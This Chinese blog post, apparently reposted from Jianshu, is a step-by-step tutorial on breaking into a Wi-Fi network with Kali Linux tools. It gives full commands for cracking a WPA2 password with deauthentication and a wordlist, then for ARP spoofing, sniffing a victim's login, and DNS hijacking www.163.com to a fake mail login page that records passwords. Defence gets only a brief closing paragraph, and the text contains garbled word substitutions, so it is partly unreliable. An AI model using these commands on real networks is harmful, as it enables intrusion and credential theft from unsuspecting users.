下面,我就来演示一下,无线网是如何被入侵并监听的。
首先我们须要一台装有Kali linux系统的攻击机,还须要一个外置的无线网卡。我这里用的是RT3070L芯片的免驱动网卡,推举大家也买此类型的。由于我在选购网卡的时候踩过不少的坑,反复换购了好几款网卡才找到了这个可以兼容kali 4.15内核的网卡。
淘宝链接分享

kali linux可以到官网下载,本日就不讲如何安装了,大家可以自行百度哈。
现在开始正式破解,插入我们的无线网卡,然后断开有线连接,不要使其连接到任何的网络。
打开终端输入 ifconfig 可以看到我们的无线网卡 wlan0
如果没有看到,可能是我们的网卡并没有启动。我们可以通过输入 ifconfig -a 看到wlan0网卡,然后通过 ifconfig wlan0 up 来启用它。
启用网卡后我们须要通过 airmon-ng start wlan0开启网卡的监听模式
开启后输入 ifconfig 这时我们可以看到我们的网卡名称变成了wlan0mon
这时我们就可以通过 airodump-ng wlan0mon 来扫描附近的wifi热点
这里我用 Xiaomi_0C327 这个热点来做演示,个中 BSSID 代表这台路由器的MAC地址 CH代表信道
再开一个终端,用 airodump-ng -c 1 --bssid 34:CE:00:26:0C:1C -w cap wlan0mon 对这台路由器进行抓包。
-c 代表信道 --bssid 代表路由器的mac地址 -w 指定抓到的包存放在哪个目录叫什么名字
这个时候我们可以看到此台路由器下连接了几台设备,以及连接设备的mac地址。但是由于设备和路由器是保持连接的状态,还没有办法抓到设备发给路由器带有密码信息的包。
以是我们要通过发送给路由器假的认证要求,来把设备踢掉线,当设备自动重新连接的时候,密码就会被抓到。
再开一个终端,输入 aireplay-ng -0 10 -a 34:CE:00:26:0C:1C -c 98:CA:33:0A:F2:82 wlan0mon 踢下线
-0 代表发送认证 10 代表发送10条 -a 指定路由器mac地址 -c 指定设备mac地址
当看到 [ WPA handshake: ] 字样时,代表我们已经成功的抓到了握手包。在目录中我们就可以看到如下图的几个文件。
末了我们通过跑字典的办法来将密码找出来。开个终端输入 aircrack-ng cap-01.cap -w password.txt 爆破
cap-01.cap 是刚刚抓到的包 -w 指定密码字典
等待一小会儿密码就破解出来了。当然我这里利用的是单线程,你也可以拿抓到的包去其他一些跑包软件里去跑,多线程加GPU能力效率要高一些。或者去网上找那些专门做跑包的店铺,几十块钱就可以出结果。
不过,最近暴出WPA2加密协议有漏洞,黑客可以在路由器和设备间的四次握手中重装加密密钥,这种攻击办法称之为KRACK。也便是说可以忽略密码直接连入wifi,不用再进行这些无聊的抓包跑包。听说这些漏洞存在于WPA2协议当中,而非单个产品或实现当中。因此,任何利用WPA2协议的无线网络均可能受到影响。
也不知道现在这个漏洞还能不能利用,找韶光测试一下。
好,内网渗透的第一步我们已经完成了,接下来我们要对目标机进行ARP欺骗和DNS挟制。
打开终端输入 airmon-ng stop wlan0mon 关闭网卡的监听模式,然后用刚刚得到的密码连入 Xiaomi_0C327 这个网络
连入后通过 ifconfig 查看网卡被分配的ip地址,可以推断出网关地址。
这里我的 wlan0 网卡分配到的地址是 192.168.31.147 以是网关地址该当便是 192.168.31.1
用 nmap 扫描一下网关,我们就可以看到内网中存活了那些主机
命令 nmap -sP 192.168.31.1/24
这里我选用 192.168.31.181 这台机器作为靶机
打开一个终端,开启自己的流量转发,使靶机的流量可以先经由攻击机,然后再到路由器。
命令 echo 1 > /proc/sys/net/ipv4/ip_forward
然后 cat /proc/sys/net/ipv4/ip_forward 如果返回 1 代表转发开启成功
打开一个终端,通过命令 arpspoof -i wlan0 -t 192.168.31.181 -r 192.168.31.1 对靶机进行ARP欺骗
-i 代表网卡 -t 代表靶机的ip -r 代表网关的ip
这时我们的攻击机已经成为了一个中间人,靶机的所有流量都要先经由攻击机,再到路由器。而靶机用户毫无察觉。
我们先来用一款小工具来监听靶机浏览的图片
打开终端输入 driftnet -i wlan0 等待出图
娱乐一下的小工具,觉得没啥用。接下来,我们抓靶机用户的登录账户和密码。
终端输入 wireshark 打开wireshark抓包工具,选择我们的 wlan0 网卡
用靶机访问 http://www.qingtaidu.cn/wp-login.php 这个wp网站的后台并登录,然后用攻击机抓包。加上一些过滤条件,方便探求。
我们还可以对靶机进行DNS挟制。正常情形下访问 http://www.163.com/ 是这个样子
然后用攻击机对这个网址进行DNS挟制,把他解析到我自己写的163邮箱的登录页面。这样用户输入账号密码都会被存下来。
首先在终端输入命令 vi /etc/ettercap/etter.dns 添加一条解析
www.163.com A 47.94.222.65
然后在嗅探欺骗类工具中打开ettercap,【sniff】>【Unified sniffing】,选择我们的 wlan0 网卡。【Plugins】>【Manage the plugins】双击 dns_spoof模块,末了【Start】>【Start sniffing】
这时靶机再访问 http://www.163.com/ 就会变成这个样子
以上的嗅探和欺骗都是建立在 http 协议上的,https 协议的会失落效。网上有教程说用 sslstrip 可以对 https进行降级,试了一下是可以降级,但是浏览器会有证书报错提示,用户很随意马虎就能创造问题。
也不知道大牛们有没有什么更好的办法
好了,说完了攻击,我们来说说防御。上面所说的嗅探都是建立在内网环境下并且进行了ARP欺骗后的,以是要防守就要把稳路由器的安全问题,密码只管即便设置的繁芜一下,大小写加数字字母符号,这样被暴力破解的几率就会减小。路由器和设备进行双向绑定,防止ARP欺骗。
作者:无穷369链接:https://www.jianshu.com/p/5e2dc94f16df来源:简书著作权归作者所有。商业转载请联系作者得到授权,非商业转载请注明出处。